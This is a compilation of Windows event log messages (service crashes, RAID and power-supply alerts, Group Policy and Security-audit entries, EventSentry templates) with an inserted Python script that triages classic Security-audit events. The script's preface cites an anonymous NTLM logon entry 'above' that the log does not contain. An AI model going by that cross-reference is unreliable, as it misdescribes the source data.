Microsoft-Windows-Eventlog
Message:
Event log automatic backup
Log: Security
File: C:\Windows\System32\Winevt\Logs\Archive-Security-2010-11-05-11-20-26-007.evtx
Message:
The configuration information of the performance library "C:\WINDOWS\system32\perfts.dll" for the "TermService" service does not match the trusted performance library information stored in the registry. The functions in this library will not be treated as trusted.
Message:
Hanging application Customer.exe, version 6.0.16.0, hang module hungapp, version 0.0.0.0, hang address 0x00000000.
Source:
service control manager
Message:
The Distributed Transaction Coordinator service terminated with service-specific error 3221229584 (0xC0001010).
Message:
Windows cannot determine the associated site for this computer. (The RPC server is too busy to complete this operation. ). Group Policy processing aborted.
Source:
application error
Message:
Faulting application Ppcl.exe, version 8.1.660.0, faulting module ntdll.dll, version 5.2.3790.4455, fault address 0x0002860e.
Source:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system
Message:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system has lost redundancy. Restore power or replace any failed or missing power supplies.
Chassis: '0'
[SNMP TRAP: 6032 in CPQHLTH.MIB]
Detected by application: Server Agents
Source:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system
Message:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system is in a failed state. Restore power or replace the failed power supply.
Chassis: '0'; Bay: '2'
[SNMP TRAP: 6050 in CPQHLTH.MIB]
Detected by application: Server Agents
Category:
Printer Management
Message:
Client printer auto-creation failed. The driver could not be installed. Possible reasons for the failure: The driver is not in the list of drivers on the server. The driver cannot be located. Driver mapping is incorrect. Client name: (WI_0NZOY79v2OfWLkfXH) Printer: (FBC-HR-3700 on ps_1 (from WI_0NZOY79v2OfWLkfXH) in session 4) Client Printer driver: (HP COLOR LASERJET 3700 PCL 6) Server Printer driver: (HP Color LaserJet 3700 PCL 6)
Message:
Access failure: Critical error on disk XXXXXXX (Port: SATA 2.0).
Message:
Error message from one of the disks failing on an onboard nVidia nForce4 RAID controller.
Message:
The MAD Monitoring thread was unable to read the state of the services, error '0x80010108'.
For more information, click http://www.microsoft.com/contentredirect.asp.
Source:
Service Control Manager
Message:
________________________________________
EVENT # 170686
EVENT LOG System
EVENT TYPE Error
SOURCE Service Control Manager
EVENT ID 7034
COMPUTERNAME HDQ121
DATE / TIME 3/8/2011 3:29:02 PM
MESSAGE The McAfee Engine Service service terminated unexpectedly. It has done this 2 time(s).
________________________________________
Find out more about the event at http://www.myeventlog.com.
Message:
The description for Event ID ( 256 ) in Source ( NSTSEC ) cannot be found. The local computer may not have the necessary registry information or message DLL files to display messages from a remote computer. You may be able to use the /AUXSOURCE= flag to retrieve this description; see Help and Support for details. The following information is part of the event: [**NST**][PID:864;TID:960][CNSTCSPHelper is initializing!][FUNC=NSTSECProxy::NSTSECProxy::CNSTCSPHelper::Initialize][FILE=.\NSTCSPClient.cpp:LINE=36]
Source:
MSExchange ActiveSync
Message:
The setting ExternalProxy in the Web.Config file was not valid. The previous value was null and has been changed to .
Message:
The server {8C53F4F9-90F5-4CA0-A8FE-76ECF5FBD2CF} did not register with DCOM within the required timeout.
Message:
The configuration of the AdminConnection\TCP protocol in the SQL instance BLACKBERRY is not valid.
Message:
Volume Shadow Copy Service error: Failed resolving account ACCOUNTNAME with status 1376. Check connection to domain controller and VssAccessControl registry key.
Operation:
Gather writers' status
Executing Asynchronous Operation
Context:
Current State: GatherWriterStatus
Error-specific details:
Error: NetLocalGroupGetMemebers(ACCOUNTNAME), 0x80070560, The specified local group does not exist.
Message:
This computer must be configured as a domain controller. To prevent this computer from shutting down in the future, run Setup on the disk that you used to install the operating system to configure the computer as a domain controller.
Message:
A provider, TPVCGProv, has been registered in the WMI namespace, Root\ThinPrint, but did not specify the HostingModel property. This provider will be run using the LocalSystem account. This account is privileged and the provider may cause a security violation if it does not correctly impersonate user requests. Ensure that provider has been reviewed for security behavior and update the HostingModel property of the provider registration to an account with the least privileges possible for the required functionality.
Message:
NTBackup error: 'The operation failed. Consult the Backup Report for more details.'
Source:
Microsoft-Windows-RPC-Events
Message:
Possible Memory Leak. Application ("C:\Windows\system32\mmc.exe" "C:\Windows\system32\dhcpmgmt.msc" ) (PID: 6320) has passed a non-NULL pointer to RPC for an [out] parameter marked [allocate(all_nodes)]. [allocate(all_nodes)] parameters are always reallocated; if the original pointer contained the address of valid memory, that memory will be leaked. The call originated on the interface with UUID ({6BFFD098-A112-3610-9833-46C3F874532D}), Method number (2). User Action: Contact your application vendor for an updated version of the application.
Source:
Microsoft-Windows-WindowsUpdateClient
Category:
Windows Update Agent
Message:
Installation Failure: Windows failed to install the following update with error 0x80070643: Security Update for SQL Server 2008 R2 (KB2494088).
Message:
Logon Failure:
Reason: Unknown user name or bad password
User Name: FIRST LAST
Domain: USER-PC
Logon Type: 3
Logon Process: NtLmSsp
Authentication Package: NTLM
Workstation Name: USER-PC
Caller User Name: -
Caller Domain: -
Caller Logon ID: -
Caller Process ID: -
Transited Services: -
Source Network Address: 0.0.0.0
Source Port: 0
Source:
Microsoft-SharePoint Products-SharePoint Foundation Search
Message:
The mount operation for the gatherer application 00000000-0000-0000-0000-000000000000 has failed because the schema version of the search administration database is less than the minimum backwards compatibility schema version supported for this gatherer application. The database might not have been upgraded.
Message:
The Dynamic Memory driver failed because dynamic memory is not supported on this release of Windows.
Message:
HP NC7781 Gigabit Server Adapter: The network link is down. Check to make sure the network cable is properly connected.
Message:
Information Store
2140
12
Message:
The SSL server credential's certificate does not have a private key information property attached to it. This most often occurs when a certificate is backed up incorrectly and then later restored. This message can also indicate a certificate enrollment failure.
Source:
Microsoft-Windows-Security-Auditing
Category:
Other Policy Change Events
Message:
One or more errors occured while processing security policy in the group policy objects.
Error Code: 87
GPO List:
{F0DF8E32-7E0A-4B67-1234-9BD831BFE64C} Windows Audit & Event Log Settings
{AAC1786C-016F-11D2-9012-00C04fB984F9} Default Domain Controllers Policy
{91B2F340-016D-11D2-1234-00C04FB984F9} Default Domain Policy
Message:
The system time was changed.
Process ID: 1296
Process Name: C:\WINDOWS\system32\EVENTSENTRY\eventsentry_svc.exe
Primary User Name: WEBSERVER$
Primary Domain: MYDOMAIN
Primary Logon ID: (0x0,0x3E7)
Client User Name: WEBSERVER$
Client Domain: MYDOMAIN
Client Logon ID: (0x0,0x3E7)
Previous Time: 8:57:01 PM 8/31/2011
New Time: 8:57:06 PM 8/31/2011
Source:
Microsoft-Windows-CAPI2
Message:
Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.
Source:
Microsoft-Windows-Resource-Exhaustion-Detector
Category:
Resource Exhaustion Diagnosis Events
Message:
Windows successfully diagnosed a low virtual memory condition. The following programs consumed the most virtual memory: SomeProcess.exe (848) consumed 372129792 bytes, Procmon64.exe (3616) consumed 209563648 bytes, and devenv.exe (6364) consumed 201162752 bytes.
Message:
Server is listening on [ 'any' <ipv4> 1433]
Message:
System Security Access Granted:
Access Granted: SeBatchLogonRight
Account Modified: DOMAINA\username
Assigned By:
User Name: SERVERNAME$
Domain: DOMAINA
Logon ID: (0x0,0x3E7)
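The four Security-audit entries above (the anonymous NTLM network logon, the NTLM logon failure with a 0.0.0.0 source address, the system time change, and the SeBatchLogonRight grant) share the classic "Title:" then "Name: value" layout. The following is an added example, not code from the page or from EventSentry, showing how a triage script can parse that layout and turn each of those entries into a finding. The sample events are constructed from the page's entries; the process allowlist for clock changes, the 60-second skew threshold and the blank-user-name handling are assumptions made for the example.

```python
"""Triage for classic-format Windows Security events (pre-Vista event text and
EventSentry-rendered messages laid out as 'Title:' then 'Name: value' lines).
Added example: samples are constructed from entries on this page; the
allowlist and skew threshold are assumptions, not page facts."""
import re
from datetime import datetime

FIELD_RE = re.compile(r"^([A-Za-z][A-Za-z ()]*?):\s*(.*)$")
SYSTEM_LOGON_ID = "(0x0,0x3E7)"           # LSA logon ID 0x3E7 is the SYSTEM session
TIME_CHANGE_ALLOWLIST = {"svchost.exe"}   # assumption: W32Time (hosted in svchost) may step the clock
MAX_BENIGN_SKEW_SECONDS = 60              # assumption: larger steps deserve a look regardless of process


def parse_event(text):
    """Split event text into (title, {field: value}).

    Field names are limited to letters, spaces and parentheses, so values that
    contain ':' themselves (times, 'cifs/host' SPNs, drive letters) stay intact."""
    lines = [ln.strip() for ln in text.strip().splitlines() if ln.strip()]
    if not lines:
        return "", {}
    title = lines[0].rstrip(":").rstrip(".")
    fields = {}
    for line in lines[1:]:
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return title, fields


def _classic_time(s):
    # "8:57:01 PM 8/31/2011" is how the time-change event renders timestamps
    return datetime.strptime(s, "%I:%M:%S %p %m/%d/%Y")


def triage(text):
    """Return a list of finding tuples for one event; empty means nothing notable."""
    title, f = parse_event(text)
    findings = []
    if title == "Successful Network Logon":
        # NTLM, logon type 3 and no named user is an anonymous (null-session) logon;
        # a blank user name is treated the same way.
        if (f.get("Logon Type") == "3" and f.get("Authentication Package") == "NTLM"
                and f.get("User Name", "").upper() in ("", "ANONYMOUS LOGON")):
            findings.append(("anonymous_ntlm_network_logon",
                             f.get("Workstation Name") or "<no workstation>"))
    elif title == "Logon Failure":
        # 'Source Network Address: 0.0.0.0' carries no origin; fall back to the
        # workstation name the client supplied (which the client also controls).
        src = f.get("Source Network Address", "-")
        origin = src if src not in ("-", "0.0.0.0") else f.get("Workstation Name", "?")
        findings.append(("logon_failure", f.get("Reason", "?"), f.get("User Name", "?"), origin))
    elif title == "The system time was changed":
        # Report clock steps made by processes outside the allowlist, or large ones.
        proc = f.get("Process Name", "").rsplit("\\", 1)[-1].lower()
        skew = 0.0
        try:
            skew = (_classic_time(f["New Time"]) - _classic_time(f["Previous Time"])).total_seconds()
        except (KeyError, ValueError):
            pass
        if proc not in TIME_CHANGE_ALLOWLIST or abs(skew) > MAX_BENIGN_SKEW_SECONDS:
            findings.append(("time_change", proc, skew))
    elif title == "System Security Access Granted":
        # A logon right was granted; 'Assigned By' with logon ID 0x3E7 means the
        # change was made in the SYSTEM context (typically policy application).
        by = f.get("User Name", "?")
        if f.get("Logon ID") == SYSTEM_LOGON_ID:
            by += " (SYSTEM context)"
        findings.append(("logon_right_granted", f.get("Access Granted", "?"),
                         f.get("Account Modified", "?"), by))
    return findings


# Constructed samples, modelled on the entries on this page.
ANONYMOUS_LOGON = r"""Successful Network Logon:
User Name:
Domain:
Logon Type: 3
Logon Process: NtLmSsp
Authentication Package: NTLM
Workstation Name:"""

LOGON_FAILURE = r"""Logon Failure:
Reason: Unknown user name or bad password
User Name: FIRST LAST
Domain: USER-PC
Logon Type: 3
Authentication Package: NTLM
Workstation Name: USER-PC
Source Network Address: 0.0.0.0"""

TIME_CHANGE = r"""The system time was changed.
Process ID: 1296
Process Name: C:\WINDOWS\system32\EVENTSENTRY\eventsentry_svc.exe
Primary Logon ID: (0x0,0x3E7)
Previous Time: 8:57:01 PM 8/31/2011
New Time: 8:57:06 PM 8/31/2011"""

RIGHT_GRANTED = r"""System Security Access Granted:
Access Granted: SeBatchLogonRight
Account Modified: DOMAINA\username
Assigned By:
User Name: SERVERNAME$
Logon ID: (0x0,0x3E7)"""
```

Running `triage()` over the four samples yields one finding each: the anonymous logon with no workstation name, the failed logon attributed to the client-supplied name USER-PC, a 5-second clock step by eventsentry_svc.exe (flagged only because that binary is not in the example allowlist), and the SeBatchLogonRight grant made in the SYSTEM context. A Kerberos logon for a named user produces no finding.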
Source:
Server Administrator
Category:
Storage Service
Message:
Controller log file entry: Physical Disk 1:0:4 Controller 0, Connector 1
Source:
Server Administrator
Category:
Storage Service
Message:
Unexpected sense. SCSI sense data: Sense key: 3 Sense code: 11 Sense qualifier: 0: Physical Disk 1:0:4 Controller 0, Connector 1
Message:
Windows cannot perform filter check for Group Policy object CN={<GUID>},CN=Policies,CN=System,DC=DOMAIN,DC=local. Group Policy processing aborted.
Message:
The power sub-system is no longer redundant.
Message:
A power supply has failed. (Power Supply 1)
User Action
Check the failed power supply and replace if necessary.
WBEM Indication Properties
AlertingElementFormat: 2 0x2 (CIMObjectPath)
Message:
Power redundancy has been lost. (Power Redundancy Set 1)
User Action
Check the power supply configuration and check the status of the power redundancy. Ensure the system is being powered adequately. Add or replace power supplies if necessary.
WBEM Indication Properties
AlertingElementFormat: 2 0x2 (CIMObjectPath)
Message:
The backup was not successful. The error is: There is not enough space on this drive to save the backup. Free up space by deleting older backups and unnecessary data or change your backup settings. (0x81000005).
Source:
Server Administrator
Category:
Storage Service
Message:
The RAID controller firmware and driver validation was not performed. The configuration file is out of date or corrupted. C:\Program Files (x86)\Dell\SysMgt\sm\cfg\: Controller 0 (SAS 6/iR Integrated)
Message:
The following fatal alert was received: 46
Message:
System Information Agent: Health: Fault Tolerant Power Supply Removed. A hot-plug fault tolerant power supply has been removed from the system.
Chassis: '0'; Bay: '2'
[SNMP TRAP: 6034 in CPQHLTH.MIB]
Message:
The attempt to power off [Computer Name] failed
Source:
Service Control Manager
Message:
The start type of the Windows Modules Installer service was changed from auto start to demand start.
Message:
ERROR: permission denied for relation SomeTable STATEMENT: select COLUMN1 from SomeTable where COLUMN2=5
Source:
Microsoft-Windows-Security-Auditing
Category:
MPSSVC Rule-Level Policy Change
Message:
Windows Firewall ignored a rule because its major version number is not recognized.
Profile: All
Ignored Rule:
ID: clr_optimization_v4.0.30319_32-1
Name: -
Category:
Service Monitoring
Message:
A driver was added:
Name: mraid35x (Mraid35x)
Status: Stopped
Startup type: Automatic
Executable: \SystemRoot\system32\drivers\mraid35x.sys
Message:
The ODBC driver for action "24hour" in the EventSentry Agent has been automatically adjusted to use "SQL Server Native Client 10.0", which is the latest version installed on this system. Dynamically added connection options: MARS_Connection=yes.
Message:
The description for Event ID ( 105 ) in Source ( hpdiags ) cannot be found. The local computer may not have the necessary registry information or message DLL files to display messages from a remote computer. You may be able to use the /AUXSOURCE= flag to retrieve this description; see Help and Support for details.
Source:
EventSentry Network Services
Message:
A SNMP trap was received:
Version: 1
Community: public
Trap Sender: vmware1.domain.local (192.168.12.55)
Trap ID: vmware.vmwProductSpecific.vmwESX.vmkLoaded (1.3.6.1.4.1.6876.4.1.6.1)
Trap Bindings:
1: vmware.vmwTraps.vmwVmID (1.3.6.1.4.1.6876.50.101) = 1
2: vmware.vmwTraps.vmwVmConfigFilePath (1.3.6.1.4.1.6876.50.102) = /vmfs/volumes/474c55f6-89ccc558-5555-001143ebb975/TestServerF/TestServerF.vmx
3: vmware.vmwVirtMachines.vmwVmTable.vmwVmEntry.vmwVmDisplayName.1 (1.3.6.1.4.1.6876.2.1.1.2.1) = TEST07-W2K3-DE
Source:
EventSentry Network Services
Message:
A SNMP trap was received:
Version: 3
Username: public
Trap Sender: ups41.domain.local (192.168.16.117)
Trap ID: apc (1.3.6.1.4.1.318.0.10)
Engine ID: 0x800000000300C0B74DD7A6
Security Level: Authentication and Privacy
Trap Bindings:
1: apc.apcmgmt.mtrapargs.mtrapargsString (1.3.6.1.4.1.318.2.3.3.0) = UPS: Passed a self-test.
Source:
EventSentry Network Services
Message:
syslog@vmserver5.domain.local[daemon.warning]: Server Administrator: Storage Service EventID: 2264 A device is missing.: Battery 0 Controller 0
Message:
Unable to log events to security log:
Status code: 0xc0000008
Value of CrashOnAuditFail: 0
Number of failed audits: 103
Category:
Performance Monitoring
Message:
The EventSentry agent is experiencing an unusually high handle count (5001 handles) and/or high memory usage (48324564 bytes), which is most likely due to a known issue in Windows Server 2003 SP2 (http://support.microsoft.com/kb/938135). It is highly recommended that you navigate to http://support.microsoft.com/kb/938135 to download and install the hotfix to resolve this issue. It is not recommended that you continue to run the agent for an extended time period without installing the Microsoft hotfix.
Failure to install the hotfix may eventually result in system instability or a system crash. Installation of the hotfix will require a reboot.
Message:
GetSessionValue Failed to Open session value return error 2
Source:
Microsoft-Windows-Service Pack Installer
Message:
There is not enough free disk space to install the Service Pack. Required=4834 MB.
Source:
MSExchange CmdletLogs
Message:
Cmdlet suceeded. Cmdlet New-Mailbox, parameters {Name=Johnny Test User, UserPrincipalName=johnnytest@domain.local, ResetPasswordOnNextLogon=False, FirstName=Johnny, Initials=, Password=System.Security.SecureString, LastName=Test, Alias=johnnytest, SamAccountName=johnnytest}.
Source:
Microsoft-Windows-Servicing
Message:
Windows Servicing failed to complete the process of setting package KB967723 (Security Update) into Installed(Installed) state
Message:
The configuration for the agent (service) could not be re-read because the "Log File Monitoring" feature/function is busy and preventing an on-line configuration update. You can try to save the configuration again at a later time, or restart the EventSentry service to force a configuration update.
Source:
Microsoft-Windows-Hyper-V-Worker-Admin
Message:
'VM-SRV-001' started successfully. (Virtual machine ID D8EB8812-63FE-468A-9545-1E2028EC1F5F)
Source:
Microsoft Windows security
Category:
System Integrity
Message:
Code Integrity determined that the page hashes of an image file are not valid. The file could be improperly signed without page hashes or corrupt due to unauthorized modification. The invalid hashes could indicate a potential disk device error.
File Name: \Device\HarddiskVolume3\Windows\System32\sysfer.dll
Source:
User profile service
Message:
Log Name: Application
Source: Microsoft-Windows-User Profiles Service
Date: 5/12/2012 4:13:40 PM
Event ID: 1530
Task Category: None
Level: Warning
Keywords:
User: SYSTEM
Computer: NONEOFYOURBIZ2
Description:
Windows detected your registry file is still in use by other applications or services. The file will be unloaded now. The applications or services that hold your registry file may not function properly afterwards.
DETAIL -
9 user registry handles leaked from \Registry\User\S-1-5-21-664570727-300873648-2978798648-1000:
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\SystemCertificates\My
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\SystemCertificates\CA
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\SystemCertificates\Disallowed
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\Windows\CurrentVersion\Explorer
Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-User Profiles Service" Guid="{89B1E9F0-5AFF-44A6-9B44-0A07A7CE5845}" />
<EventID>1530</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2012-05-12T20:13:40.907441900Z" />
<EventRecordID>30031</EventRecordID>
<Correlation />
<Execution ProcessID="416" ThreadID="4684" />
<Channel>Application</Channel>
<Computer>NONEOFYOURBIZ2</Computer>
<Security UserID="S-1-5-18" />
</System>
<EventData Name="EVENT_HIVE_LEAK">
<Data Name="Detail">9 user registry handles leaked from \Registry\User\S-1-5-21-664570727-300873648-2978798648-1000:
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\SystemCertificates\My
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\SystemCertificates\CA
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\SystemCertificates\Disallowed
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\Windows\CurrentVersion\Explorer
</Data>
</EventData>
</Event>
Source:
Microsoft-Windows-GroupPolicy
Message:
The processing of Group Policy failed. Windows could not evaluate the Windows Management Instrumentation (WMI) filter for the Group Policy object cn={D3610029-DDDD-4141-AAAA-FDFFFFCCBB22},cn=policies,cn=system,DC=yourdomain,DC=local. This could be caused by RSOP being disabled or Windows Management Instrumentation (WMI) service being disabled, stopped, or other WMI errors. Make sure the WMI service is started and the startup type is set to automatic. New Group Policy objects or settings will not process until this event has been resolved.
Source:
Service Control Manager
Message:
The EventSentry service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
Message:
The server was unable to allocate from the system nonpaged pool because the server reached the configured limit for nonpaged pool allocations.
Source:
Microsoft-Windows-Security-Auditing
Message:
An account was logged off.
Subject:
Security ID: Domain\ad2user
Account Name: ad1user
Account Domain: Domain
Logon ID: 0xbb55b23
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
Source:
Microsoft-Windows-CertificateServicesClient-AutoEnrollment
Message:
Certificate for %1 with Thumbprint %2 is about to expire or has already expired.
Message:
System shutdown due to graphics card overheating.
Message:
The driver detected a controller error on \Device\Harddisk1\%.
Source:
Service Control Manager
Message:
The VNC Server Version 4 service terminated unexpectedly. It has done this 1 time(s)
Message:
An account was successfully logged on.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WORKSTATION123$
Account Domain: CORPDOMAIN
Logon ID: 0x3e7
Logon Type: 7
New Logon:
Security ID: CORPDOMAIN\john.doe
Account Name: john.doe
Account Domain: CORPDOMAIN
Logon ID: 0xf3e668
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x314
Process Name: C:\Windows\System32\winlogon.exe
Network Information:
Workstation Name: WORKSTATION123
Source Network Address: 127.0.0.1
Source Port: 0
Detailed Authentication Information:
Logon Process: User32
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
Message:
A new process has been created.
Subject:
Security ID: CORPDOMAIN\jack.doe
Account Name: jack.doe
Account Domain: CORPDOMAIN
Logon ID: 0xc2b4c
Process Information:
New Process ID: 0xcec0
New Process Name: C:\Windows\System32\PING.EXE
Token Elevation Type: TokenElevationTypeLimited (2)
Creator Process ID: 0x116c
Message:
Intel(R) 82574L Gigabit Network Connection
Network link is disconnected.
Source:
Service Control Manager
Message:
The Creative Audio Service service failed to start due to the following error:
The system cannot find the file specified.
Message:
The driver \Driver\WUDFRd failed to load for the device WpdBusEnumRoot\UMB\2&37c186b&0&STORAGE#VOLUME#_??_USBSTOR#DISK&VEN_GENERIC-&PROD_COMPACT_FLASH&REV_1.01#7&1C4905A4&0&058F63646476&1#.
Source:
Windows Media Player Network Sharing Service
Message:
Service 'WMPNetworkSvc' did not start correctly because CoCreateInstance(CLSID_UPnPDeviceFinder) encountered error '0x80004005'. Verify that the UPnPHost service is running and that the UPnPHost component of Windows is installed properly.
Category:
Other Logon/Logoff Events
Message:
The workstation was locked.
Subject:
Security ID: GOTHAM\bat.man
Account Name: bat.man
Account Domain: GOTHAM
Logon ID: 0x19a2e6
Session ID: 1
Category:
Other Logon/Logoff Events
Message:
The workstation was unlocked.
Subject:
Security ID: GOTHAM\bat.man
Account Name: bat.man
Account Domain: GOTHAM
Logon ID: 0x19a2e6
Session ID: 1
Category:
User Account Management
Message:
A user account was locked out.
Subject:
Security ID: SYSTEM
Account Name: CORPDC1$
Account Domain: CORPDOMAIN
Logon ID: 0x3e7
Account That Was Locked Out:
Security ID: S-1-5-21-1179352123-210183264333-1239653321-8754
Account Name: beth.jackson
Additional Information:
Caller Computer Name: CORPDC1
Message:
EventSentry is caching more than 1024 files in the monitored directory C:\Web. To keep the resource consumption of the EventSentry agent low it is recommended that you move old files to a sub directory or another directory.
Source:
Microsoft-Windows-Security-Auditing
Message:
A handle to an object was requested.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: COMPUTER$
Account Domain: DOMAIN
Logon ID: 0x3E7
Object:
Object Server: Security
Object Type: File
Object Name: C:\Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.9200.16384_none_8325ae6a331660a6\GdiPlus.dll
Handle ID: 0x0
Resource Attributes: -
Process Information:
Process ID: 0x354
Process Name: C:\Windows\System32\svchost.exe
Access Request Information:
Transaction ID: {00000000-0000-0000-0000-000000000000}
Accesses: READ_CONTROL
SYNCHRONIZE
ReadData (or ListDirectory)
ReadEA
ReadAttributes
WriteAttributes
Access Reasons: READ_CONTROL: Granted by D:(A;;0x1200a9;;;BA)
SYNCHRONIZE: Granted by D:(A;;0x1200a9;;;BA)
ReadData (or ListDirectory): Granted by D:(A;;0x1200a9;;;BA)
ReadEA: Granted by D:(A;;0x1200a9;;;BA)
ReadAttributes: Granted by ACE on parent folder D:(A;;0x1200a9;;;BA)
WriteAttributes: Not granted
Access Mask: 0x120189
Privileges Used for Access Check: -
Restricted SID Count: 0
Message:
Action "%1" was unable to create a TCP connection with host "%2" due to error: %3
Message:
Action "%1" was unable to create a UDP socket to connect to host "%2" due to error: %3
Message:
EventSentry was unable to connect to the ODBC target %1 due to error "%2". EventSentry will cache data and forward it to the ODBC target once the database has become available again.
Message:
Action "%1" was unable to send a message to host "%2" due to error: %3
Message:
Action "%1" triggered process "%2", which ran for %3 seconds with the result shown below. Return code was %4.
%5
Message:
The process action "%1" was unable to execute process "%2" due to error "%3".
Message:
Process %1 (triggered by action "%2") exceeded the maximum allowed time interval of %3 minute(s) and EventSentry was unable to terminate the process due to the following error:
%4
Message:
Process %1 (triggered by action "%2") exceeded the maximum allowed time interval of %3 minute(s) and the process was terminated. Please increase the timeout interval for this process in the management application (System Health -> Application Scheduler).
Message:
Action "%1" triggered process "%2" successfully.
Message:
Action "%1" was unable to send trap to SNMP host "%2" due to error: %3
Message:
Action "%1" was unable to connect to SNPP host "%2" due to error: %3
Message:
Action "%1" was unable to send a message to pager ID "%2" due to error: %3
Message:
Action "%1" was unable to send the message due to error: %2
Message:
Unable to connect to the SCM (service control manager) due to error %1 (%2). The action "%3" failed to execute.
Message:
Unable to open the requested service (%1) due to error %2 (%3). The action "%4" failed to execute.
Message:
Unable to send the requested control to service %1, most likely due to error %2 (%3). The action "%4" failed to execute.
Message:
The checksum for executable file "%1" changed from the original checksum "%2". Only the EventSentry agent should have access to this file. This change indicates a potential security breach, and the process will not be launched. The contents of the file should be verified; restarting the EventSentry will re-create the file.
Message:
The service %1 could not be restarted because the it could not be stopped in the first place. The notification "%2" failed to execute.
Message:
The requested service control was successfully sent to service %1, however the current service status is still %2. Please monitor the status of the %1 service to ensure it is in the desired state.
Message:
The process "%1" was terminated successfully.
Instances Terminated: %2.
Affected Process Identifiers (PIDs): %3
Message:
The process "%1" could not be terminated due to error "%2".
Message:
Action "%1" was unable to initiate a system shutdown/reboot due to error: %3
Message:
Action "%1" was unable to connect to Jabber host "%2" due to error: %3
Message:
Action "%1" was unable to send a message to chat room "%2" due to error: %3
Message:
Action "%1" was unable to submit an event to "%2" due to error "%3".
Message:
Action "%1" was successfully submitted event with number %3 to "%2".
Message:
The EventSentry agent is ready.
Version: %1
Codepage: %2
The following packages are assigned:
Event Log Packages:
-------------------
%3
Log File Packages:
-------------------
%4
System Health Packages:
-----------------------
%5
Compliance Tracking Packages:
-----------------------------
%6
Message:
The EventSentry agent is stopping
Message:
EventSentry has successfully re-opened a handle to the "%1" event log after it has become invalid due to error "%2".
Message:
Unable to allocate memory (for %1) in routine %2
Message:
The agent was unable to find the local hostname (%1, %2) in the configuration, mostly due to a license problem. Make sure that only as many full hosts are configured in the EventSentry groups as licenses are installed. Note that Heartbeat-Only hosts which have the "Monitor Agent" option set count towards full host licenses.
Message:
4/18/2013 9:42:41 AM
While processing a TGS request for the target server krbtgt/DOMAIN.LOCAL, the account DESKTOP04$@DOMAIN.LOCAL did not have a suitable key for generating a Kerberos ticket (the missing key has an ID of 8). The requested etypes were 18. The accounts available etypes were 23 -133 -128 3 1.
Category:
Service Monitoring
Message:
The status for the service trustedinstaller(Windows Modules Installer) changed from Running to Stopped.
Addtional Information:
Startup Type: manual
Executable: C:\Windows\servicing
TrustedInstaller.exe
Service account: LocalSystem
Source:
Microsoft-Windows-FailoverClustering
Message:
